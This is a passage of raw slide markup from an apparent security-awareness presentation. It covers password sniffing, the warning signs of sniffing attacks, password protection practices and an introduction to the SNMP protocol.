              <a:t>Password sniffing is a covert method used by attackers to capture passwords as they traverse a network. This technique involves monitoring network traffic to intercept sensitive information without altering the data packets.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" b="0" dirty="0">
              <a:latin typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>Passive Wiretapping:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t> Monitoring network traffic without generating any traffic, making it difficult to detect.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>ARP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t> Poisoning:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t> Redirecting network traffic to intercept communications and capture passwords.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>Cleartext</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t> Vulnerability:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t> Exploiting networks that transmit unencrypted passwords.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>Sniffer Tools:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>Wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>Ettercap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t> to capture and analyze network packets.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3">
            <a:extLst>
              <a:ext uri="{40342BCF-6CF6-495D-9A7D-FAE1A7DC800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60EFAB-4905-4C4D-9552-3CB5CCAD5EF5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Date Placeholder 1">
            <a:extLst>
              <a:ext uri="{D95830BD-9592-443B-9D14-B7A55092183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1DFA8A-299F-49D7-8D0D-12B3577FE693}"/>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E157911E-6622-4F2B-BE2B-299D5D4620D6}" type="datetime4">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>November 12, 2025</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 8">
            <a:extLst>
              <a:ext uri="{C54401B0-DB06-4035-9D8D-974390BA7E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F401B3-46CA-4154-AEDB-413A9B14C68D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="257175"/>
            <a:ext cx="4701282"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4. sniffing password hashes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Image 4">
            <a:extLst>
              <a:ext uri="{2F29239A-D0B2-4FD3-A332-EEAA00A1F1E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12F5A3-BDC8-4EBE-B242-01A438B4E459}"/>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20FB08CA-7F40-442F-93DB-3F227EF4628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6E0EE19C-2C62-4A2F-B65A-EC50E4C7BF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0B610B-ED8A-4593-BBB4-B6DBFC37AC8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="390648" y="1190501"/>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Signs of Password Sniffing Attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{F32B9D78-6834-471D-82B3-5B2C9DC0A5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67C42F-BB5B-4469-899B-16B787566F62}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1733550"/>
            <a:ext cx="7553068" cy="2892742"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>Detecting password sniffing attacks can be challenging due to their covert nature. However, there are several signs that may indicate such an attack is occurring on your network. Being aware of these signs can help in early detection and mitigation.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" b="0" dirty="0">
              <a:latin typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>Unusual Network Traffic:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t> Sudden spikes or irregular patterns in network traffic.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>Unexpected Login Attempts:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t> Frequent failed login attempts or logins from unfamiliar locations.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>Unauthorized Devices:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t> Detection of unknown devices connected to the network.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>Presence of Sniffing Tools:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t> Discovery of software like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>Wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>Ettercap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t> on network devices.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>Altered Network Configurations:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t> Changes in network settings or configurations without authorization.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3">
            <a:extLst>
              <a:ext uri="{EC45A7C8-1900-4A67-A464-E28CAB0190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BBE5A9-2699-402E-9DF8-5E34386FBC76}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Date Placeholder 1">
            <a:extLst>
              <a:ext uri="{4885144C-7C59-494F-B652-D5BE5352D8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C2BE2C-F496-46E5-A1A6-CD048826DB09}"/>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221A3567-DE19-433B-8EA7-5E8CBA1407D9}" type="datetime4">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>November 12, 2025</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 8">
            <a:extLst>
              <a:ext uri="{F650DBB6-B56D-4054-BE1B-DE4FC55F52C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8DD91C-E094-4666-8D76-A6FCD2035972}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="257175"/>
            <a:ext cx="4701282"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4. sniffing password hashes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Image 4">
            <a:extLst>
              <a:ext uri="{EAB79D89-63DE-460A-A16D-C645230D54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8FEF06F-7534-4A10-A1F0-C61FBB2AA065}"/>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AFDD1AFC-A8AC-4189-B433-66DAAE1C4F2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30378357-F482-4F9F-BFC1-26EC3B55D31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BDDEA00-E0DE-4742-B25C-EE02B47C5D88}"/>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Description</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{D559E49C-3AD0-4CF2-ABFD-44B53EE7462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95378E-F51D-4499-9A33-B854FA5889F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1733550"/>
            <a:ext cx="7553068" cy="2892742"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>Password protection is an access control technique that helps keep important data safe from hackers by ensuring it can only be accessed with the right credentials.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" b="0" dirty="0">
              <a:latin typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>Importance</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>Passwords remain an effective solution for identity-based access control of digital assets when considering cost, security benefits, and ease of use and management.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>Password security systems are used not just to protect data but also to verify and establish identity for personalized features and account access.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>Stolen credentials are commonly used by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>cyberattackers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t> to deliver malware. For this reason, it's important to adopt password security best practices.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Date Placeholder 1">
            <a:extLst>
              <a:ext uri="{45896521-8DA0-4C74-A49E-06F6FCE654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5645C0-F5FA-4B3C-89BE-39B8244E165F}"/>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B47F2010-F572-4D79-BFC2-5D6586884A6B}" type="datetime4">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>November 12, 2025</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 8">
            <a:extLst>
              <a:ext uri="{70AED7F4-04D9-4731-997A-58B187B407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71BD358-5ABE-46CF-B5AC-2E82293D8893}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="253946"/>
            <a:ext cx="39582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dirty="0"/>
              <a:t>5. password protection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Image 4">
            <a:extLst>
              <a:ext uri="{015430FA-C839-4793-B80B-CDD645CE1E9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E4B34D-57ED-48DC-8F65-7C634F92D923}"/>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F88C4D71-2A79-4BE2-A4F5-78E63DA39A1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E448DA2E-A501-444E-8049-866F7EAB97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3BFD32-8DC9-49E6-9F9F-CAA5BD38F27F}"/>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Best Practices</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{0833439D-1038-4A7B-9247-590ACDA52C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561B88E-5698-4312-95E0-807575CA4E5C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1733550"/>
            <a:ext cx="7553068" cy="2892742"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>Embed security in training and culture</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>Using and managing passwords has become a challenge for users as well as IT and security teams. Protection from cyberattacks is only as strong as the weakest link. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" b="0" dirty="0">
              <a:latin typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>Change passwords frequently</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>Requiring users to change passwords on a regular basis is one of the easiest and most effective ways to increase the security of passwords. Enterprise management systems can require users to change passwords on a set schedule. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" b="0" dirty="0">
              <a:latin typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>Safely store passwords</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>A password manager is an app that generates complex passwords and stores them in an encrypted format.  The advantage of a password manager is that it remembers and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>autofills</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t> passwords and can suggest long, difficult-to-crack random passwords.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Date Placeholder 1">
            <a:extLst>
              <a:ext uri="{A3C79510-96C9-4783-B822-8A89D1BD67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3FF1CFD-357D-4DEB-9B31-06647CFFF0BA}"/>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39D0AA5D-8958-48F0-B53B-D49EF0D02A4E}" type="datetime4">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>November 12, 2025</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 8">
            <a:extLst>
              <a:ext uri="{CD02DF08-50F6-4120-AB47-2C932C3C16F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A847BDA-324D-4C8B-9BD6-8594B6740CEB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="253946"/>
            <a:ext cx="39582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dirty="0"/>
              <a:t>5. password protection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Image 4">
            <a:extLst>
              <a:ext uri="{B519308C-D920-4533-96F2-C7EBA6E0197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144221E-A1F4-421C-8EAF-79008A096BB9}"/>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6F2593C4-CE1E-4061-BB1B-A00A023A064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99C4FBDC-E277-48C7-86AB-65CA7B0728E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78B0BA-789F-4416-88DB-C2867A5C8314}"/>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SNMP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{A352A06B-7012-4BDB-8427-CA5D900C7DC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D581A2-3AB9-486E-9928-F80FAA2979E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1809750"/>
            <a:ext cx="5909452" cy="750417"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>Simple Network Management Protocol (SNMP) is a protocol used in TCP/IP networks to collect and manage information about networked devices.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400" b="0" dirty="0">
              <a:latin typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3">
            <a:extLst>
              <a:ext uri="{EA4F32B7-90C8-47CE-888D-4DC56EAAB3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44838AE-144E-4DEF-8395-55025DCFB7C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="257175"/>
            <a:ext cx="7953366" cy="647700"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>1. SNMP Services Enumeration &amp; countermeasures</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Date Placeholder 1">
            <a:extLst>
              <a:ext uri="{06335E98-1BF3-4018-8E7E-D7F4E4CC1F2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88D27D-3AB0-4793-B743-DC81CA0CBE13}"/>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3CCC9685-7651-4410-A20F-86263D517A21}" type="datetime4">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>November 12, 2025</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text Box 6">
            <a:extLst>
              <a:ext uri="{AA376C26-0D91-4E10-B6F8-FFD52AB341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C73960-4E11-43D3-BD24-14A70F99BB1D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="2752725"/>
            <a:ext cx="5602748" cy="1428407"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="95250" tIns="47625" rIns="95250" bIns="47625" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="104999"/>
              </a:lnSpc>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="1400" dirty="0"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>It operates on UDP port 161 to listen for requests.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="104999"/>
              </a:lnSpc>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="1400" dirty="0"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>It operates in the application layer 7 of the OSI model.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="104999"/>
              </a:lnSpc>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="1400" dirty="0"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>The SNMP protocol is supported by many types of devices including routers, switches, servers, printers, Network Attached Storage (NAS), firewalls, WLAN controllers and more.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="1400" dirty="0"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" b="0" dirty="0">
              <a:latin typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Image 4">
            <a:extLst>
              <a:ext uri="{F18E798C-3631-4469-82D4-B11733EC777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C17E35-C854-4258-A897-53B427BC37F4}"/>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70285E7F-689B-4283-BEF3-628A577D202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499607D1-8F5D-4851-BD3D-85C78C67BB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C9ECF32-D625-4C89-B597-7678B3BB3457}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="371351" y="1151905"/>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Best Practices</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{8BA0357C-EDCE-49D2-B2EC-24B62326C73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8ED7719-4351-4390-BC6E-8DC88456C220}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
